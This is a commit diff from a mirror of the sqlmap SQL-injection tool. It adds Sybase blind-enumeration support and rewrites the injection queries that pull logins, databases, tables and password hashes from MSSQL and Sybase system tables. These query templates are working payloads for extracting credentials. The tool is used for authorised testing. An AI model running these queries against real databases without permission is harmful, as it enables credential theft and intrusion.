mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-29 04:53:48 +03:00
update for Sybase and major bug fix for --passwords on MSSQL
This commit is contained in:
parent
9b56fbafbe
commit
8a9a57c709
|
@ -16,9 +16,3 @@ from plugins.generic.enumeration import Enumeration as GenericEnumeration
|
|||
class Enumeration(GenericEnumeration):
|
||||
def __init__(self):
|
||||
GenericEnumeration.__init__(self, "Sybase")
|
||||
|
||||
def getPasswordHashes(self):
|
||||
warnMsg = "on Sybase it is not possible to enumerate the user password hashes"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return {}
|
||||
|
|
|
@ -167,7 +167,7 @@ class Enumeration:
|
|||
|
||||
for index in indexRange:
|
||||
if kb.dbms == "Sybase":
|
||||
query = rootQuery.blind.query % (','.join(map(lambda x: "'%s'" % x, kb.data.cachedUsers)) if kb.data.cachedUsers else "'%s'" % randomStr())
|
||||
query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ")
|
||||
elif condition:
|
||||
query = rootQuery.blind.query2 % index
|
||||
else:
|
||||
|
@ -282,7 +282,9 @@ class Enumeration:
|
|||
indexRange = getRange(count, plusOne=plusOne)
|
||||
|
||||
for index in indexRange:
|
||||
if kb.dbms == "Microsoft SQL Server":
|
||||
if kb.dbms == "Sybase":
|
||||
query = rootQuery.blind.query % (user, (kb.data.cachedUsersPasswords[-1] if kb.data.cachedUsersPasswords else " "))
|
||||
elif kb.dbms == "Microsoft SQL Server":
|
||||
if kb.dbmsVersion[0] in ( "2005", "2008" ):
|
||||
query = rootQuery.blind.query2 % (user, index, user)
|
||||
else:
|
||||
|
@ -664,7 +666,9 @@ class Enumeration:
|
|||
indexRange = getRange(count)
|
||||
|
||||
for index in indexRange:
|
||||
if kb.dbms == "MySQL" and not kb.data.has_information_schema:
|
||||
if kb.dbms == "Sybase":
|
||||
query = rootQuery.blind.query % (kb.data.cachedDbs[-1] if kb.data.cachedDbs else " ")
|
||||
elif kb.dbms == "MySQL" and not kb.data.has_information_schema:
|
||||
query = rootQuery.blind.query2 % index
|
||||
else:
|
||||
query = rootQuery.blind.query % index
|
||||
|
@ -785,7 +789,9 @@ class Enumeration:
|
|||
indexRange = getRange(count, plusOne=plusOne)
|
||||
|
||||
for index in indexRange:
|
||||
if kb.dbms in ("SQLite", "Firebird"):
|
||||
if kb.dbms == "Sybase":
|
||||
query = rootQuery.blind.query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else " "))
|
||||
elif kb.dbms in ("SQLite", "Firebird"):
|
||||
query = rootQuery.blind.query % index
|
||||
else:
|
||||
query = rootQuery.blind.query % (db, index)
|
||||
|
|
|
@ -254,7 +254,7 @@
|
|||
</users>
|
||||
<passwords>
|
||||
<inband query="SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins" query2="SELECT name, master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins" condition="name"/>
|
||||
<blind query="SELECT TOP 1 master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM master..sysxlogins WHERE name='%s')" query2="SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM sys.sql_logins WHERE name='%s')" count="SELECT LTRIM(STR(COUNT(password))) FROM master..sysxlogins WHERE name='%s'" count2="SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'"/>
|
||||
<blind query="SELECT TOP 1 master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins WHERE name='%s' AND password NOT IN (SELECT TOP %d password FROM master..sysxlogins WHERE name='%s')" query2="SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='%s' AND password NOT IN (SELECT TOP %d password FROM sys.sql_logins WHERE name='%s')" count="SELECT LTRIM(STR(COUNT(password))) FROM master..sysxlogins WHERE name='%s'" count2="SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'"/>
|
||||
</passwords>
|
||||
<!-- NOTE: in Microsoft SQL Server there is no query to enumerate DBMS users privileges -->
|
||||
<privileges/>
|
||||
|
@ -473,21 +473,21 @@
|
|||
<is_dba query="PATINDEX('%sa_role%', SHOW_ROLE())>0"/>
|
||||
<users>
|
||||
<inband query="SELECT name FROM master..syslogins ORDER BY 1"/>
|
||||
<blind query="SELECT MIN(name) FROM master..syslogins WHERE name NOT IN (%s)" count="SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins"/>
|
||||
<blind query="SELECT MIN(name) FROM master..syslogins WHERE name > '%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins"/>
|
||||
</users>
|
||||
<passwords>
|
||||
<inband query="SELECT name, password FROM master..syslogins" condition="name"/>
|
||||
<blind query="SELECT TOP 1 password FROM master..syslogins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM master..syslogins WHERE name='%s')" count="SELECT LTRIM(STR(COUNT(password))) FROM master..syslogins WHERE name='%s'"/>
|
||||
<blind query="SELECT MIN(password) FROM master..syslogins WHERE name='%s' AND password > '%s'" count="SELECT LTRIM(STR(COUNT(password))) FROM master..syslogins WHERE name='%s'"/>
|
||||
</passwords>
|
||||
<privileges/>
|
||||
<roles/>
|
||||
<dbs>
|
||||
<inband query="SELECT name FROM master..sysdatabases ORDER BY 1"/>
|
||||
<blind query="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases)" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
|
||||
<blind query="SELECT MIN(name) FROM master..sysdatabases WHERE name > '%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT name FROM %s..sysobjects WHERE type IN ('U') ORDER BY 1"/>
|
||||
<blind query="SELECT TOP 1 name FROM %s..sysobjects WHERE type IN ('U') AND name NOT IN (SELECT TOP %d name FROM %s..sysobjects WHERE type IN ('U'))" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE type IN ('U')"/>
|
||||
<blind query="SELECT MIN(name) FROM %s..sysobjects WHERE type IN ('U') AND name > '%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE type IN ('U')"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT %s..syscolumns.name, TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" condition="[DB]..syscolumns.name"/>
|
||||
|
|
Loading…
Reference in New Issue
Block a user